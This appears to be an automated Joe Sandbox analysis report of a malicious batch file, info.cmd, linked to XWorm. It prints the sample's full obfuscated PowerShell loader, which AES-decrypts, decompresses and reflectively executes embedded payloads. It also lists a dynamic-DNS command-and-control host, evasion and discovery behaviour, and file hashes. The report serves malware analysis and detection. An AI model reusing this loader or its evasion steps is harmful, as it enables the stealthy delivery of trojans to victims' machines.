Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: amsi64_5536.amsi.csv, type: OTHER
Source: Yara match; File source: \Device\ConDrv, type: DROPPED
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('pplpjhm4gqsp820ezozlinzkclgjwzafhfyauo/d1yu='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('kfkma+h0xjazq+yg0jthmw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $lifcl=new-object system.io.memorystream(,$param_var); $ykppp=new-object system.io.memorystream; $drfoq=new-object system.io.compression.gzipstream($lifcl, [io.compression.compressionmode]::decompress); $drfoq.copyto($ykppp); $drfoq.dispose(); $lifcl.dispose(); $ykppp.dispose(); $ykppp.toarray();}function execute_function($param_var,$param2_var){ $agqbx=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rerds=$agqbx.entrypoint; $rerds.invoke($null, $param2_var);}$usdbw = 'c:\users\user\desktop\info.cmd';$host.ui.rawui.windowtitle = $usdbw;$rybfn=[system.io.file]::('txetlladaer'[-1..-11] -join '')($usdbw).split([environment]::newline);foreach ($bsmhm in $rybfn) { if ($bsmhm.startswith('wugliziwocqvfjuaxzxg')) { $fyrof=$bsmhm.substring(20); break; }}$payloads_var=[string[]]$fyrof.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Mitre Att&ck Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Behavior Graph (ID: 1446781, Sample: info.cmd, Startdate: 23/05/2024, Architecture: WINDOWS, Score: 76): cmd.exe starts powershell.exe, conhost.exe and two further cmd.exe instances; powershell.exe resolves newremisco2905.duckdns.org (163.172.59.233, port 2905, local port 49705, OnlineSASFR, United Kingdom), drops \Device\ConDrv (ASCII) and starts wermgr.exe. Signatures on the graph: Snort IDS alert for network traffic; Yara detected Powershell decode and execute; Sigma detected: Suspicious PowerShell Parameter Substring; Uses dynamic DNS services; Suspicious powershell command line found; Obfuscated command line found; Bypasses PowerShell execution policy.

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
info.cmd | 3% | ReversingLabs | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
http://upx.sf.net | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
newremisco2905.duckdns.org | 163.172.59.233 | true | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
http://upx.sf.net | Amcache.hve.5.dr | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | --- | ---
163.172.59.233 | newremisco2905.duckdns.org | United Kingdom | | 12876 | OnlineSASFR | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446781
Start date and time: 2024-05-23 21:06:20 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: info.cmd
Detection: MAL
Classification: mal76.troj.evad.winCMD@9/9@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .cmd
• Override analysis time to 240s for powershell
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.208.16.94
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed; the report is missing behavior information
        • VT rate limit hit for: info.cmd
Time | Type | Description
--- | --- | ---
15:07:25 | API Interceptor | 7444886x Sleep call for process: powershell.exe modified
15:10:34 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
163.172.59.233 | bSFJ.exe | malicious | XWorm |
| receipt.vbs | malicious | XWorm |
| Docs.vbs | malicious | XWorm |
| damaged_items.wsf | malicious | XWorm |
| file.ps1 | malicious | XWorm |
| damaged_item.vbs | malicious | XWorm |
| file2.ps1 | malicious | XWorm |
| item_pictures.vbs | malicious | XWorm |
| 1707765188292b82159fb496a7b8faef3eed8405341a5e1f23597583777c553dcec1a90478611.dat-decoded.exe | malicious | XWorm |
| screen_shots.vbs | malicious | XWorm |

No context
        Match       | Associated Sample Name / URL | SHA 256  | Detection | Threat Name | Link   | Context
        OnlineSASFR | https://suite-trezor-io.owconsulting.fr/ | Get hash | malicious | Unknown | Browse | 163.172.255.246
                    | https://link.tmr04.com/c?q=lbDkjvuqh3Lwv34SJZrn7LGF2gBHaHR0cHM6Ly9zdGFnZWRlc2Vjb25kZS4xamV1bmUxc29sdXRpb24uZ291di5mci91dGlsaXNhdGV1cnMvaW5zY3JpcHRpb26sYlV-PpkyI6Ebn0wKrGZMssHksLM9fAVfHK5saW5rLnRtcjA0LmNvbQ | Get hash | malicious | Unknown | Browse | 51.159.204.229
                    | https://pdf-ca0478494.istmein.de/svx/ | Get hash | malicious | Unknown | Browse | 51.159.84.191
                    | jXBjxhHQgR.exe | Get hash | malicious | CMSBrute | Browse | 195.154.168.209
                    | fonts-util | Get hash | malicious | Unknown | Browse | 163.172.139.104
                    | https://olioingravidanza.it/par/ | Get hash | malicious | Unknown | Browse | 51.159.84.191
                    | aowNKqhrAX.elf | Get hash | malicious | Mirai | Browse | 163.172.191.132
                    | 2mim34IfQZ.exe | Get hash | malicious | AsyncRAT, PureLog Stealer, Xmrig, zgRAT | Browse | 51.15.65.182
                    | jew.x86.elf | Get hash | malicious | Unknown | Browse | 212.129.5.11
                    | http://eurovisionsongcontest.nl | Get hash | malicious | Unknown | Browse | 51.159.84.191
                            No context
                            No context
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.5193645502518501
                            Encrypted:false
                            SSDEEP:96:Z8FnjwIrxYid/RH3Uje0eu/RoJV1QXIGZAX/d5FMT2SlPkpXmTAjf/VXT5NHBjTB:OhNmG/R30h/AzuiFTZ24lO8
                            MD5:5BAACB43EFA7EF614BAC9563FA3063A1
                            SHA1:77F6A39A84C483EBECCD885AEE866E5F363B5E6B
                            SHA-256:6E03558DAC6314092824222B1EDB895749A15ED4C01D22466E0163EA7A7CE289
                            SHA-512:77B688075FFE05C74E412CFB27132FEFBAC2990D7DE1A778BE6E3C33F0550A5D7E79FB235B0155743716A5D8C7D4CA88D8BFF16FF58BB8B14A4C8553F82008D6
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.4.3.0.2.3.5.5.9.6.5.4.7.6.1.5.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.5.0.2.9.7.3.5.1.7.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.b.5.2.8.4.2.-.c.3.c.d.-.4.8.c.2.-.a.2.0.2.-.4.6.0.6.3.c.3.4.d.b.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.0.-.0.0.0.1.-.0.0.1.4.-.9.4.0.5.-.7.c.6.f.4.4.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):7200
                            Entropy (8bit):3.6836503723230667
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbdvQZdkzU6YO+LvjgmfHNGfB7Te5aMfTm:R6l7wVeJdvHzU6YO0rgmftW4pfTm
                            MD5:F76415C8A6548340A2C58211133EB3E9
                            SHA1:1F34FED18AEB2DA685F7197D84FBD7392EF345C6
                            SHA-256:D6D1958BC63F22BE2115F2725C0DC9E5DEF89E07E40D8AD7541B1EC8264A820B
                            SHA-512:66981261704EFBA432FFF199FB3B20AAE9E88F61CA91396C808919807D673AEC14B3B7C0C4F8DA5DA2BFD202CAF17198E8B5620408E56319CF6DA7EFCADB36A1
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.3.6.<./.P.i.
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4691
                            Entropy (8bit):4.506933787754004
                            Encrypted:false
                            SSDEEP:96:uIjf5I7Qp7VoJFKlEFBfFTWTXFBfFerrufqd:uIlYQp7G4TIufI
                            MD5:C1EFADC40EE702DFF401A8D187729C3F
                            SHA1:CBE52FF9FE3EF3BF61CD159A23DA9F5D5CF748C2
                            SHA-256:66437F36FD405F4FE85EEC4696614E1807882051A8FD9FBDA22F5A9C6A478400
                            SHA-512:B885A2FE6DCB58F58227016C860537105A7BC1D7497E387BD02089875CA1A758956EAE71D8D2D91DC0DB9AE2B7BB35F3AFDE512D2284DAEB100B8F0B922ED424
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Reputation:low
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3056
                            Entropy (8bit):5.465515946139154
                            Encrypted:false
                            SSDEEP:48:CAzsSU4y4RQmFoUeCamfm9qr9t5/78NKRwS4GxJZKaVEouYAgwd64rHLjtv5/G+v:CAzlHyIFKL2O9qrh7KKRwSJ5Eo9Adrxj
                            MD5:2E5BCE07104547FE87397C8EAA3BA817
                            SHA1:A2F2D555B3C08681427546C57E311E802A4F8025
                            SHA-256:9DF2A6BDD89423BBC9661A09C46FC35E8626F525E7DA41B9D1286AB75835931E
                            SHA-512:FBB8063CD45BA3009CBF170E6CF6DADA809D0D9E6849FE0BA2C93AE9E0692BEF5BB2A8605C8B41E595ACE541D02F3618332FB408461D51D1519C9CAE0BDC0155
                            Malicious:false
                            Reputation:low
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.372852778539526
                            Encrypted:false
                            SSDEEP:6144:2FVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguN/iL:WV1qyWWI/glMM6kF7tq
                            MD5:A62F919E2E93C0A8C261829F2534F5C8
                            SHA1:F821794632F69885CE3A0E18B7D9828B37E26181
                            SHA-256:A6AFD4714D392CB9BDCEB35D98989210702A57C90078C28B4F146E8A0A78C50B
                            SHA-512:7C533FC29A853DD20A57C6C40E6C311E03925E13F8BD17C4ED9ADBDBCBD0EF39B29A3520925E2D1DC37D161A75EA0FC7F2119D4D4639B9CA51CF7B0C93FAE3CF
                            Malicious:false
                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....D...............................................................................................................................................................................................................................................................................................................................................D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (1904), with CRLF line terminators
                            Category:dropped
                            Size (bytes):1906
                            Entropy (8bit):5.62643685088677
                            Encrypted:false
                            SSDEEP:48:IJRm8RUYRxSKBCAqjBqozDpOXkHOkvkT//XbhG2ZlZAmzMIuwfOLx1CH2c:QBN7PBUjBqoVEngeLAmOwGLxAWc
                            MD5:AA10B706E5AECFC58FE487E0831021F2
                            SHA1:94696B1080DB3691AFB2B0172772B972A316AC96
                            SHA-256:F9107FAD68067406EEABB8AB916F3E6907343D0DC918815007DF678FDA3E0CE0
                            SHA-512:62FC144C7941838D0E41110802F80265FBCAD14288358F323E7F4ECEFEECF6894916FFDFF35FE9122C3CCF5243ED5BAD6347766BC6FEB4AF5AEBD3EFF7E99773
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: \Device\ConDrv, Author: Joe Security
